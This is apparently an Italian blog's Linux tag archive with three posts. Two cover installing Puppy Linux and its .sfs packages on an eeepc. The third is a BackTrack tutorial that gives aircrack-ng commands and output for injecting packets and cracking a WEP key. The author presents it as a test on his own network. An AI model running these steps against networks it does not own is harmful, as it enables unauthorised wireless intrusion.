logo

Tag Archive for Linux

Puppy Linux: installare i file .sfs (openoffice)

Anche se Puppy ha preinstallato dei buoni programmi equivalenti a quelli windows office quali: Abiword, Gnumeric, ho preferito installare anche OpenOffice, in particolare la versione più leggera 4 KIDS (meno di 100 MB).

Il file, una volta scaricato, si presenta con estensione .sfs, pertanto per avviarlo abbiamo varie soluzioni:

-lanciarlo tramite “SFS-load” o usare SFS installer  (se disponibile);

– copiare semplicemente il contenuto del file .sfs sulla home e riavviare;

– avviare “Bootmanager configure bootup”, selezionare il tasto “add ” ed inserire il nostro file per essere aggiunto alla lista dei pacchetti che saranno caricati al boot (non applicabile con l’installazione completa);

– convertire il file .sfs in un pacchetto  .pet utilizzando il comando “dir2sfs”.

Vediamo l’ultimo caso:

 

linux puppy 1

Per convertire da .sfs a .pet è necessario creare una cartella e rinominarla con il nome dell’applicativo completo della versione:

linux puppy 1

Continua a leggere Read more

Precise Puppy 5.4: installazione su eeepc

Esasperato dall’incredibile lentezza del mio piccolo Asus 900, ho deciso di sostituire windows XP preinstallato con una leggera versione LINUX. Dopo numerosi tentativi, con varie distro, mi sono orientato su Puppy Linux.

Delle versioni Puppy ho provato sia Lucid Puppy (5.2.8) che la recentissima Precise Puppy (5.4) rilasciata il 23 ottobre 2012. Le prestazioni della versione Precise sono sorprendenti, nettamente più veloce della Lucid,  l’avvio richiede circa 1 minuto e, in soli 157.5 MB, sono presenti programmi di editor, grafica, video e audio, più che sufficienti per le prestazioni richieste al piccolo ASUS, la configurazione è semplice e veloce, compresa quella internet.

Tutte le versioni di prova erano state installate su una microSD da 500 MB (copiando l’immagine ISO sulla SD con UNetbootin).

L’installazione su HD richiede solo pochi minuti, prima di tutto bisogna cliccare sull’applicazione “Install” presente sul Desktop:

e scegliere l’installazione Universale, successivamente selezionare il dispositivo dove installare Puppy:

 

Una volta selezionato il drive, è necessario partizionarlo e formattarlo con GParted. Essendo il primo HD di 3,76 GB, l’ho partizionato in due parti, la prima partizione (sda1) di circa 3 GB è stata formattata in “ext3”,  la seconda partizione (sda2) di circa 850 GB è stata formattata per lo swapping (linux-swap):

Confermiamo l’installazione di Linux nella partizione ext3:

Confermare quanto riportato nelle finestre di dialogo e, una volta completata l’installazione, è necessario configurare il bootloader; io ho usato Grub4DosConfig per installare GRUB nell’ MBR:

 

Anche in questo caso confermare le operazioni richieste e l’installazione è conclusa. Adesso basta  riavviare il PC.

Back|Track Packet injection con AirPort

dragon_small.jpg

Molti insistono ad impiegare, o meglio a provare ad utilizzare Kismac con la scheda Airport del Macbook con la speranza di violare una rete wireless, attualmente è impossibile. L’unica cosa che possono fare è abilitare i drivers per il “passive mode” (vedete l’articolo relativo) ma niente di più.

Con questo non voglio dire che con la scheda Airport non si può fare l’injection, è solo che per farlo usano la piattaforma sbagliata.

Difatti per abilitare tale funzione occorre solo il giusto programma:

Backtrack

una distribuzione live di Linux (circa 700 Mb) con vari utili programmi tra i quali Aircrack.

La procedura è molto semplice:

Andate sul sito http://www.remote-exploit.org/backtrack.html e scaricate l’immagine iso .

Una volta scaricata l’immagine masterizzatela su un CD (consiglio di farlo con Utility Disco/Masterizza senza complicarvi la vita con altri programmi).

Creato il cd lasciatelo inserito nel computer ed riavviate il MAC tenendo premuto il tasto C in modo tale da avviare da CD-rom, partirà l’installazione.

Quando vi verrà chiesto la modalità grafica vi consiglio di scegliere KDE.

Una volta installato aprite il pannello All Applications e sfogliate le seguenti cartelle:

Backtrack

Radio Network Analysis

80211

Cracking

Aircrack

Dalla cartella Aircrack avviate tre programmi in tre diverse Shell:

Air Replay

Aiodump

Aircrack

La procedura per cracking è stata già esaurientemente descritta nell’articolo relativo ad Aircrack-ng ma per completezza sintetizzo come procedere.

Il test è stato eseguito sulla mia rete Wireless per l’occasione protetta con chiave WEP.

Dalla Shell Airodump digitate:

iwconfig

e scoprite la sigla attribuita alla vostra scheda wifi:

lo no wileress extensions

eth0 no wileress extensions

wifi0 no wireless exensions

ath0 IEEE 802.11g ESSID:”” Nikname:””

Mode: Managed Channel:0 Access Point Not-Associated

Bit Rate:0 kb/s Tx-Power:14 dBm Sensitivity:1/1

Retry:off RTS thr:off Fragment thr:off

Encription key :off Power Management:off

digitate

airmon-ng start wifi0:

interface Chipset Driver

wifi0 Atheros madwifi-ng

ath0 Atheros madwifi-ng VAP (parent: wifi0)

ath1 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

che abilita ath1 (la mia scheda) in monitor mode

poi:

airodump-ng ath1

segnatevi il canale CH e fermate l’applicazione:

ctrl C

digitate:

airodump-ng -c 1 -w pippo ath1

Airodump inizierà a lavorare e salverà di dati catturati nel file pippo-01.cap

Adesso per stimolare la produzione di IVs procedete con l’injection:

per testare se la scheda funziona:

aireplay-ng -9 ath1

se è tutto ok apparirà:

Trying broadcast probe requests….

Found 1 AP

poi procederò a pingare gli Access Point disponibili:

Trying directed probe requests

00:19:xx:xx:xx:xx – channel 1 – ‘Alice-xxxxxx’

Ping (min/avg/max): 3.969ms/104.333ms/171.666 ms Power 78.79

30/30: 100%

Injection is working!

aireplay-ng -3 -b (indirizzo MAC del A.P.) -d ff:ff:ff:ff:ff:ff -h (indirzzo MAC del T.C.) ath1

ed ecco partire l’injection dalla nostra Airport.

Dalla Shell di Airodump tenete sotto controllo i paccketti IVs catturati e, quanto arrivate ad un numero discreto (a me ne sono bastati 34000), procedete con il cracking.

Dalla Shell di Aircrack digitate

aircrack-ng -a 1 pippo-01.cap

se i pacchetti catturati sono sufficienti, in pocki secondi otterrete la chiave.

Come già detto per i dettagli e le varie modalità di attacco leggete l’articolo relativo a Aircrack ng.

Buon lavoro